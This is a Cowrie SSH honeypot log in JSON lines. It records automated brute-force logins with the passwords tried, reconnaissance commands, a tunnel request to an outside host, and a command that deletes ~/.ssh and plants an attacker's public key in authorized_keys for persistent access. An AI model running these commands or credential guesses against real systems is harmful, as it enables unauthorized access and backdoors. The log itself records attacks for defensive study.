{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:27:33.384130Z","src_ip":"212.227.235.229","session":"fabe7fcf0e27"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:27:35.484077Z","src_ip":"212.227.235.229","session":"502efa86b9ea"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:27:37.564643Z","src_ip":"212.227.125.160","session":"cdcf2cc1321c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:27:37.566535Z","src_ip":"212.227.125.160","session":"cdcf2cc1321c"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"admin123","message":"login attempt [tomcat/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:27:39.233647Z","src_ip":"212.227.235.229","session":"fabe7fcf0e27"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:41.150427Z","src_ip":"212.227.235.229","session":"fabe7fcf0e27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43360,"dst_ip":"1.2.3.4","dst_port":22,"session":"403820cb4fe3","protocol":"ssh","message":"New connection: 212.227.235.229:43360 (1.2.3.4:22) [session: 403820cb4fe3]","sensor":"my-vps","timestamp":"2025-08-31T06:27:49.149774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:27:49.150697Z","src_ip":"212.227.235.229","session":"403820cb4fe3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:27:49.432603Z","src_ip":"212.227.235.229","session":"403820cb4fe3"}
{"eventid":"cowrie.login.failed","username":"colin","password":"colin","message":"login attempt [colin/colin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:27:50.601600Z","src_ip":"212.227.235.229","session":"403820cb4fe3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:51.885821Z","src_ip":"212.227.235.229","session":"403820cb4fe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34246,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e0e7efe5eb3","protocol":"ssh","message":"New connection: 212.227.125.160:34246 (1.2.3.4:22) [session: 5e0e7efe5eb3]","sensor":"my-vps","timestamp":"2025-08-31T06:27:54.088721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:27:54.494807Z","src_ip":"212.227.125.160","session":"5e0e7efe5eb3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:27:54.495546Z","src_ip":"212.227.125.160","session":"5e0e7efe5eb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57049,"dst_ip":"1.2.3.4","dst_port":22,"session":"758c4e2d225b","protocol":"ssh","message":"New connection: 212.227.235.229:57049 (1.2.3.4:22) [session: 758c4e2d225b]","sensor":"my-vps","timestamp":"2025-08-31T06:27:55.301579Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:55.302725Z","src_ip":"212.227.235.229","session":"758c4e2d225b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57341,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b474ff318c4","protocol":"ssh","message":"New connection: 212.227.235.229:57341 (1.2.3.4:22) [session: 4b474ff318c4]","sensor":"my-vps","timestamp":"2025-08-31T06:27:55.431252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:27:55.432167Z","src_ip":"212.227.235.229","session":"4b474ff318c4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T06:27:55.562320Z","src_ip":"212.227.235.229","session":"4b474ff318c4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:27:55.950815Z","src_ip":"212.227.235.229","session":"4b474ff318c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T06:27:56.080934Z","session":"4b474ff318c4"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"admin123","message":"login attempt [tomcat/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:27:56.367538Z","src_ip":"212.227.125.160","session":"5e0e7efe5eb3"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:58.163118Z","src_ip":"212.227.125.160","session":"5e0e7efe5eb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59656,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b9cff5db108","protocol":"ssh","message":"New connection: 212.227.235.229:59656 (1.2.3.4:22) [session: 4b9cff5db108]","sensor":"my-vps","timestamp":"2025-08-31T06:28:05.761436Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:28:07.212585Z","src_ip":"212.227.235.229","session":"502efa86b9ea"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:28:07.213304Z","src_ip":"212.227.235.229","session":"502efa86b9ea"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:28:11.665960Z","src_ip":"212.227.235.229","session":"4b9cff5db108"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:28:11.668066Z","src_ip":"212.227.235.229","session":"4b9cff5db108"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"5.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:13.020414Z","src_ip":"212.227.235.229","session":"502efa86b9ea"}
{"eventid":"cowrie.session.closed","duration":"85.8","message":"Connection lost after 85.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:13.021544Z","src_ip":"212.227.235.229","session":"502efa86b9ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59404,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e2f16eb1524","protocol":"ssh","message":"New connection: 212.227.125.160:59404 (1.2.3.4:22) [session: 2e2f16eb1524]","sensor":"my-vps","timestamp":"2025-08-31T06:28:17.555532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:28:18.185101Z","src_ip":"212.227.125.160","session":"2e2f16eb1524"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:28:18.185827Z","src_ip":"212.227.125.160","session":"2e2f16eb1524"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:28:19.035992Z","src_ip":"212.227.125.160","session":"cdcf2cc1321c"}
{"eventid":"cowrie.login.success","username":"root","password":"Alpha","message":"login attempt [root/Alpha] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:28:21.544932Z","src_ip":"212.227.125.160","session":"2e2f16eb1524"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:28:23.606251Z","src_ip":"212.227.125.160","session":"2e2f16eb1524"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T06:28:23.607053Z","src_ip":"212.227.125.160","session":"2e2f16eb1524"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:24.299130Z","src_ip":"212.227.125.160","session":"2e2f16eb1524"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:24.300215Z","src_ip":"212.227.125.160","session":"2e2f16eb1524"}
{"eventid":"cowrie.session.closed","duration":"59.7","message":"Connection lost after 59.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:25.663028Z","src_ip":"212.227.125.160","session":"cdcf2cc1321c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33353,"dst_ip":"1.2.3.4","dst_port":22,"session":"2304d29293a9","protocol":"ssh","message":"New connection: 212.227.235.229:33353 (1.2.3.4:22) [session: 2304d29293a9]","sensor":"my-vps","timestamp":"2025-08-31T06:28:26.430472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:28:26.432452Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:28:26.649530Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41106,"dst_ip":"1.2.3.4","dst_port":22,"session":"82bc0f0818de","protocol":"ssh","message":"New connection: 212.227.235.229:41106 (1.2.3.4:22) [session: 82bc0f0818de]","sensor":"my-vps","timestamp":"2025-08-31T06:28:26.871567Z"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz2wsx3edc4rfv","message":"login attempt [root/!Qaz2wsx3edc4rfv] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:28:27.524759Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:28:28.427576Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:28:28.428299Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:28:28.429463Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:28:28.648959Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:28:29.108755Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:28:29.109458Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:28:29.330261Z","src_ip":"212.227.235.229","session":"2304d29293a9"}
